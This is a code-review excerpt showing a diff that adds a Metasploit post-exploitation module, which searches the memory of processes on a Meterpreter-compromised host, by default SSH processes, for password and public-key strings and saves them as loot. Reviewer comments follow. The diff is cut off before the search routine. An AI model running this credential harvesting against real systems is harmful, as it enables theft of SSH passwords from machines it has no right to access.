modules/post/multi/gather/memory_search.rb

```diff
@@ -0,0 +1,226 @@
+        },
+        'License' => MSF_LICENSE,
+        'Author' => %w[sjanusz-r7],
+        'SessionTypes' => %w[meterpreter],
+        'Platform' => %w[linux unix osx windows],
+        'Arch' => [ARCH_X86, ARCH_X64],
+        'Compat' => {
+          'Meterpreter' => {
+            'Commands' => %w[
+              stdapi_sys_process_memory_search
+              stdapi_sys_process_get_processes
+            ]
+          }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+    register_options(
+      [
+        ::Msf::OptString.new('PROCESS_NAMES_GLOB', [false, 'Glob used to target processes', 'ssh.*']),
+        ::Msf::OptString.new('PROCESS_IDS', [false, 'Comma delimited process ID/IDs to search through']),
+        ::Msf::OptString.new('REGEX', [true, 'Regular expression to search for within memory', 'publickey,password.*']),
+        ::Msf::OptInt.new('MIN_MATCH_LEN', [true, 'The minimum number of bytes to match', 5]),
+        ::Msf::OptInt.new('MAX_MATCH_LEN', [true, 'The maximum number of bytes to match', 127]),
+        ::Msf::OptBool.new('REPLACE_NON_PRINTABLE_BYTES', [false, 'Replace non-printable bytes with "."', true]),
+        ::Msf::OptBool.new('SAVE_LOOT', [false, 'Save the memory matches to loot', true])
+      ]
+    )
+  end
+
+  def process_names_glob
+    datastore['PROCESS_NAMES_GLOB']
+  end
+
+  def process_ids
+    datastore['PROCESS_IDS']
+  end
+
+  def regex
+    datastore['REGEX']
+  end
+
+  def min_match_len
+    datastore['MIN_MATCH_LEN']
+  end
+
+  def max_match_len
+    datastore['MAX_MATCH_LEN']
+  end
+
+  def replace_non_printable_bytes?
+    datastore['REPLACE_NON_PRINTABLE_BYTES']
+  end
+
+  def save_loot?
+    datastore['SAVE_LOOT']
+  end
+
+  def get_target_processes
+    raw_target_pids = process_ids || ''
+    target_pids = raw_target_pids.split(',').map(&:to_i)
+    target_processes = []
+
+    session_processes = session.sys.process.get_processes
+    session_processes.each do |session_process|
+      pid, _ppid, name, _path, _session, _user, _arch = *session_process.values
+      if (::File.fnmatch(process_names_glob, name, ::File::FNM_EXTGLOB) unless process_names_glob.empty?) || (target_pids.include? pid)
+        target_processes.append session_process
+      end
+    end
+
+    target_processes
+  end
+
+  def run_against_multiple_processes(processes: [])
+    results = []
+
+    processes.each do |process|
+      response = nil
+      status = nil
+
+      begin
+        response = memory_search(process['pid'], regex, min_match_len, max_match_len)
+        status = :success
+      rescue ::Rex::Post::Meterpreter::RequestError => e
+        response = e
+        status = :failure
+      end
+
+      results.append({ process: process, status: status, response: response })
+    end
+
+    results
+  end
+
+  def memory_search(pid, needle, min_search_len, match_len)
```

Comment:
Maybe have this upstream in a library?

Reply:
Probably makes sense to move this into the Meterpreter API for sure; Not a blocker for me - but we should do it :+1:

Reply:
For reference, we already have Post methods for Linux memory read and ASCII search (by regex):

https://github.com/rapid7/metasploit-framework/blob/d60e38220e7f9305e5d8a8a537656c8d3883396e/lib/msf/core/post/linux/process.rb#L29-L37